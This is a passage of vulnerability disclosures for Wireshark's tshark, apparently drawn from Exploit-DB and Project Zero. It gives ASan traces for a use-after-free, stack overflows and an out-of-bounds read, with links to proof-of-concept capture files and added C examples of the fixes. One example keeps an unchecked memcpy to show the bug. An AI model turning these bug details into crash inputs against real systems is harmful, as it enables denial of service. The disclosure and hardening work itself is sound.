Shadow bytes around the buggy address:
0x00008088fea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00008088feb0: 00 00 00 00 05 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x00008088fec0: 00 00 00 01 f9 f9 f9 f9 00 01 f9 f9 f9 f9 f9 f9
0x00008088fed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00008088fee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x00008088fef0: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9[06]f9 f9 f9
0x00008088ff00: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 01 f9 f9
0x00008088ff10: f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 06 f9 f9 f9
0x00008088ff20: f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 06 f9 f9 f9
0x00008088ff30: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9
0x00008088ff40: f9 f9 f9 f9 00 00 01 f9 f9 f9 f9 f9 06 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5629==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11794. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39001.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=645
The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
Attached are three files which trigger the crash.
--- cut ---
==5117==ERROR: AddressSanitizer: heap-use-after-free on address 0x61b00001e3b2 at pc 0x000000499bad bp 0x7ffd2111f650 sp 0x7ffd2111ee00
READ of size 4 at 0x61b00001e3b2 thread T0
#0 0x499bac in memcmp llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:416
#1 0x37949bc in addresses_equal wireshark/epan/dissectors/./../address.h:140:26
#2 0x379389a in rsvp_equal wireshark/epan/dissectors/packet-rsvp.c:1886:13
#3 0x7f77e4ae95ef in g_hash_table_lookup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x385ef)
#4 0x3796e2d in dissect_rsvp_common wireshark/epan/dissectors/packet-rsvp.c:7531:37
#5 0x37930d4 in dissect_rsvp wireshark/epan/dissectors/packet-rsvp.c:7553:5
#6 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#7 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#8 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#9 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#10 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#11 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#12 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#13 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#14 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#15 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#16 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#17 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#18 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#19 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#20 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#21 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#22 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#24 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#26 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#27 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#28 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#29 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#30 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#31 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#32 0x53c91b in process_packet wireshark/tshark.c:3728:5
#33 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#34 0x52c1df in main wireshark/tshark.c:2197:13
0x61b00001e3b2 is located 50 bytes inside of 1500-byte region [0x61b00001e380,0x61b00001e95c)
freed by thread T0 here:
#0 0x4d7380 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
#1 0x7f77e4aff6ae in g_realloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e6ae)
#2 0x9d71b7 in wtap_read_packet_bytes wireshark/wiretap/wtap.c:1419:2
#3 0x89ee21 in libpcap_read_packet wireshark/wiretap/libpcap.c:722:7
#4 0x8991f4 in libpcap_read wireshark/wiretap/libpcap.c:619:9
#5 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#6 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#7 0x52c1df in main wireshark/tshark.c:2197:13
previously allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f77e4aff610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x83fff6 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2
#3 0x53214d in cf_open wireshark/tshark.c:4195:9
#4 0x52bc7e in main wireshark/tshark.c:2188:9
SUMMARY: AddressSanitizer: heap-use-after-free llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:416 in memcmp
Shadow bytes around the buggy address:
0x0c367fffbc20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbc30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbc40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbc50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbc60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c367fffbc70: fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd
0x0c367fffbc80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fffbc90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fffbca0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fffbcb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fffbcc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5117==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11793. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39002.zip
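In the rsvp report above the freed region is the packet buffer that wtap_read_packet_bytes grew with g_realloc, and the use is a memcmp on an address inside rsvp_equal during a hash-table lookup. The example below assumes (an inference from the trace, not a statement of the actual bug) that a table key kept a pointer into that transient buffer; it is added here and is not Wireshark's code. It shows the defensive pattern: a per-session key that owns a copy of the address bytes, built with a bounds check against the packet, so it stays valid after the reader reallocates or overwrites its buffer for the next packet. The table is a fixed array instead of a hash table to keep the example self-contained; the packet contents and all names are constructed.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* A session key that holds a COPY of the address bytes, never a pointer into the packet buffer. */
typedef struct {
    uint8_t  addr[16];      /* room for IPv6; IPv4 uses the first 4 bytes */
    uint8_t  addr_len;
    uint32_t session_id;
} session_key;

#define MAX_SESSIONS 8
static session_key table[MAX_SESSIONS];
static size_t table_len;

/* Build a key from bytes inside a transient packet buffer. The copy is what makes
 * the key safe to keep once that buffer is reallocated or reused. */
static int key_from_packet(const uint8_t *pkt, size_t pkt_len, size_t addr_off,
                           uint8_t addr_len, uint32_t session_id, session_key *out)
{
    if (addr_len > sizeof out->addr || addr_off > pkt_len || pkt_len - addr_off < addr_len)
        return -1;                        /* address would lie outside the packet */
    memset(out, 0, sizeof *out);
    memcpy(out->addr, pkt + addr_off, addr_len);
    out->addr_len = addr_len;
    out->session_id = session_id;
    return 0;
}

static int keys_equal(const session_key *a, const session_key *b)
{
    return a->addr_len == b->addr_len && a->session_id == b->session_id &&
           memcmp(a->addr, b->addr, a->addr_len) == 0;   /* compares owned bytes only */
}

static int table_insert(const session_key *k)
{
    if (table_len >= MAX_SESSIONS) return -1;
    table[table_len++] = *k;              /* struct copy: the table owns its key data */
    return 0;
}

static int table_lookup(const session_key *k)
{
    for (size_t i = 0; i < table_len; i++)
        if (keys_equal(&table[i], k)) return (int)i;
    return -1;
}

/* Simulate a reader that reuses one growing buffer for every packet: packet 1 is recorded,
 * then the buffer is reallocated and overwritten by a larger packet 2, which is exactly
 * when a key holding a raw pointer would start comparing freed memory. Returns 1 on success. */
static int demo_key_survives_realloc(void)
{
    uint8_t *buf = malloc(64);
    if (!buf) return -1;
    memset(buf, 0, 64);
    memcpy(buf + 12, (const uint8_t[]){10, 0, 0, 1}, 4);   /* constructed packet 1: 10.0.0.1 at offset 12 */
    session_key k1;
    if (key_from_packet(buf, 64, 12, 4, 0x1234, &k1) != 0) { free(buf); return -1; }
    table_len = 0;
    table_insert(&k1);

    uint8_t *grown = realloc(buf, 1500);  /* packet 2 is bigger: buffer may move */
    if (!grown) { free(buf); return -1; }
    buf = grown;
    memset(buf, 0xAA, 1500);              /* packet 1's bytes are gone */

    session_key probe, other;
    const uint8_t same[] = {10, 0, 0, 1};
    key_from_packet(same, sizeof same, 0, 4, 0x1234, &probe);  /* same contents as packet 1 */
    key_from_packet(buf, 1500, 12, 4, 0x1234, &other);         /* what is in the buffer now */
    int found = table_lookup(&probe);
    int other_found = table_lookup(&other);

    free(buf);
    return (found == 0 && other_found == -1) ? 1 : 0;
}
```

Under an ASan build the same demo with a pointer-holding key would fail at the memcmp in keys_equal, with the "freed by" stack pointing at the realloc, which is the shape of the trace above.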
Source: https://code.google.com/p/google-security-research/issues/detail?id=644
The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==4567==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc1c406210 at pc 0x0000004c1386 bp 0x7ffc1c406010 sp 0x7ffc1c4057c0
WRITE of size 32 at 0x7ffc1c406210 thread T0
#0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0xc27f15 in tvb_memcpy wireshark/epan/tvbuff.c:783:10
#2 0x233feeb in dissect_diameter_base_framed_ipv6_prefix wireshark/epan/dissectors/packet-diameter.c:526:3
#3 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#4 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#5 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#6 0x234b527 in call_avp_subdissector wireshark/epan/dissectors/packet-diameter.c:612:4
#7 0x234a804 in dissect_diameter_avp wireshark/epan/dissectors/packet-diameter.c:805:2
#8 0x23514b5 in dissect_diameter_common wireshark/epan/dissectors/packet-diameter.c:1405:13
#9 0x233f82f in dissect_diameter wireshark/epan/dissectors/packet-diameter.c:1495:9
#10 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#11 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#12 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#13 0x39012a2 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
#14 0x38f7d37 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
#15 0x38f0ac8 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
#16 0x38ed8e6 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
#17 0x38eb79f in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
#18 0x38e95d5 in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
#19 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#20 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#21 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#22 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#23 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#24 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#25 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#26 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#27 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#28 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#29 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#30 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#31 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#32 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#33 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#34 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#35 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#36 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#37 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#38 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#39 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#40 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#41 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#42 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#43 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#44 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#45 0x53c91b in process_packet wireshark/tshark.c:3728:5
#46 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#47 0x52c1df in main wireshark/tshark.c:2197:13
Address 0x7ffc1c406210 is located in stack of thread T0 at offset 48 in frame
#0 0x233fb4f in dissect_diameter_base_framed_ipv6_prefix wireshark/epan/dissectors/packet-diameter.c:504
This frame has 2 object(s):
[32, 48) 'value'
[64, 80) 'addr' <== Memory access at offset 48 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x100003878bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c00: 00 00 00 00 f1 f1 f1 f1 04 f2 04 f3 00 00 00 00
0x100003878c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c30: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
=>0x100003878c40: 00 00[f2]f2 00 00 f3 f3 00 00 00 00 00 00 00 00
0x100003878c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==4567==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11792. Attached is a file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39003.zip
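The Diameter frame listing above is the whole story: a 32-byte write into the 16-byte `value` array, spilling into `addr`. A Framed-IPv6-Prefix payload (RFC 3162 layout: one reserved byte, one prefix-length byte in bits, then the prefix bytes) carries an 8-bit length field, so a malicious AVP can claim up to 255 bits, i.e. 32 bytes, while the destination only holds 128 bits. The following is an added illustration of that bug shape and the check that closes it; it is not Wireshark's packet-diameter.c code, and the sample AVPs are constructed here rather than taken from the attached PoC file.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Framed-IPv6-Prefix AVP payload as laid out in RFC 3162:
 *   byte 0: reserved, byte 1: prefix length in bits, bytes 2..: prefix bytes.
 * A prefix is at most 128 bits = 16 bytes. */
#define IPV6_PREFIX_MAX_BITS 128u

/* Bytes implied by a prefix-length field. An 8-bit field can say 255,
 * i.e. 32 bytes: that is the "WRITE of size 32" in the trace above. */
size_t framed_ipv6_prefix_bytes(unsigned prefix_bits)
{
    return (prefix_bits + 7) / 8;
}

/* The shape of the bug: copy length taken from the packet, destination a
 * fixed 16-byte stack array. Kept for contrast only; nothing below calls it. */
void framed_ipv6_prefix_unchecked(const uint8_t *avp, uint8_t value[16])
{
    size_t nbytes = framed_ipv6_prefix_bytes(avp[1]); /* up to 32 */
    memcpy(value, avp + 2, nbytes);                   /* overflows when avp[1] > 128 */
}

/* Hardened parser: rejects a prefix length above 128 bits and an AVP shorter
 * than its prefix length claims. Returns 0 on success, -1 on malformed input. */
int framed_ipv6_prefix_parse(const uint8_t *avp, size_t avp_len,
                             uint8_t value[16], unsigned *prefix_bits)
{
    if (avp == NULL || avp_len < 2)
        return -1;
    unsigned bits = avp[1];
    if (bits > IPV6_PREFIX_MAX_BITS)
        return -1;                                    /* the missing check */
    size_t nbytes = framed_ipv6_prefix_bytes(bits);
    if (avp_len - 2 < nbytes)
        return -1;                                    /* truncated AVP */
    memset(value, 0, 16);
    memcpy(value, avp + 2, nbytes);                   /* nbytes <= 16 here */
    *prefix_bits = bits;
    return 0;
}

/* Constructed sample AVPs (illustration only, not the attached PoC). */
static const uint8_t good_avp[]    = { 0x00, 64, 0x20, 0x01, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x01 };
static const uint8_t bad_len_avp[] = { 0x00, 255, 0xaa, 0xbb };   /* 255 bits -> 32 bytes */
static const uint8_t short_avp[]   = { 0x00, 64, 0x20, 0x01 };    /* claims 8 bytes, has 2 */

/* 1 if the well-formed sample parses to 2001:db8:0:1::/64 with a zeroed tail, else 0 */
int demo_good_prefix(void)
{
    uint8_t value[16]; unsigned bits = 0;
    if (framed_ipv6_prefix_parse(good_avp, sizeof good_avp, value, &bits) != 0) return 0;
    if (bits != 64 || memcmp(value, good_avp + 2, 8) != 0) return 0;
    for (int i = 8; i < 16; i++) if (value[i] != 0) return 0;
    return 1;
}

int demo_bad_prefix_len(void)
{
    uint8_t value[16]; unsigned bits = 0;
    return framed_ipv6_prefix_parse(bad_len_avp, sizeof bad_len_avp, value, &bits);
}

int demo_short_avp(void)
{
    uint8_t value[16]; unsigned bits = 0;
    return framed_ipv6_prefix_parse(short_avp, sizeof short_avp, value, &bits);
}

int main(void)
{
    printf("prefix_len 255 would copy %zu bytes into a 16-byte buffer\n",
           framed_ipv6_prefix_bytes(255));
    printf("good AVP parsed: %d, oversized prefix rejected: %d, truncated AVP rejected: %d\n",
           demo_good_prefix(), demo_bad_prefix_len() == -1, demo_short_avp() == -1);
    return 0;
}
```

The two checks are independent: clamping the bit count to 128 bounds the destination, and comparing the implied byte count against the remaining AVP length bounds the source, which is the read-side counterpart of the same bug.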
Source: https://code.google.com/p/google-security-research/issues/detail?id=643
The following crash due to a stack-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==3901==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffeadbc852d at pc 0x0000009cea23 bp 0x7ffeadbbf650 sp 0x7ffeadbbf648
READ of size 1 at 0x7ffeadbc852d thread T0
#0 0x9cea22 in find_signature wireshark/wiretap/vwr.c:2214:17
#1 0x9c5066 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1435:15
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
Address 0x7ffeadbc852d is located in stack of thread T0 at offset 32813 in frame
#0 0x9bbbcf in vwr_process_rec_data wireshark/wiretap/vwr.c:2320
This frame has 1 object(s):
[32, 32800) 'rec' <== Memory access at offset 32813 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/wiretap/vwr.c:2214:17 in find_signature
Shadow bytes around the buggy address:
0x100055b71050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100055b710a0: 00 00 00 00 f3[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
0x100055b710b0: f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
0x100055b710c0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b710d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b710e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b710f0: f1 f1 f1 f1 04 f2 04 f3 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3901==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11791. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39004.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=642
The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
Attached are three files which trigger the crash.
--- cut ---
==2992==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe9b2a2fc0 at pc 0x0000004c1386 bp 0x7ffe9b2a0f70 sp 0x7ffe9b2a0720
WRITE of size 43264 at 0x7ffe9b2a2fc0 thread T0
#0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0x4189c2b in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:713:9
#2 0x29525e9 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17767:9
#3 0x2924581 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18375:10
#4 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#5 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#6 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#7 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#8 0x28d825c in dissect_wlan_radio wireshark/epan/dissectors/packet-ieee80211-radio.c:976:10
#9 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#10 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#11 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#12 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#13 0x28e5df4 in dissect_radiotap wireshark/epan/dissectors/packet-ieee80211-radiotap.c:1796:2
#14 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#15 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#16 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#17 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#18 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#19 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#20 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#21 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#22 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#23 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#24 0x53c91b in process_packet wireshark/tshark.c:3728:5
#25 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#26 0x52c1df in main wireshark/tshark.c:2197:13
Address 0x7ffe9b2a2fc0 is located in stack of thread T0 at offset 8256 in frame
#0 0x418907f in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:630
This frame has 5 object(s):
[32, 44) 'id'
[64, 8256) 'tmp_data'
[8512, 8516) 'tmp_len' <== Memory access at offset 8256 partially underflows this variable
[8528, 8544) 'id.coerce' <== Memory access at offset 8256 partially underflows this variable
[8560, 8576) 'id.coerce83' <== Memory access at offset 8256 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x10005364c5a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c5b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c5c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c5d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c5e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10005364c5f0: 00 00 00 00 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2
0x10005364c600: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
0x10005364c610: f2 f2 f2 f2 f2 f2 f2 f2 04 f2 00 00 f2 f2 00 00
0x10005364c620: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==2992==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11790. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39005.zip
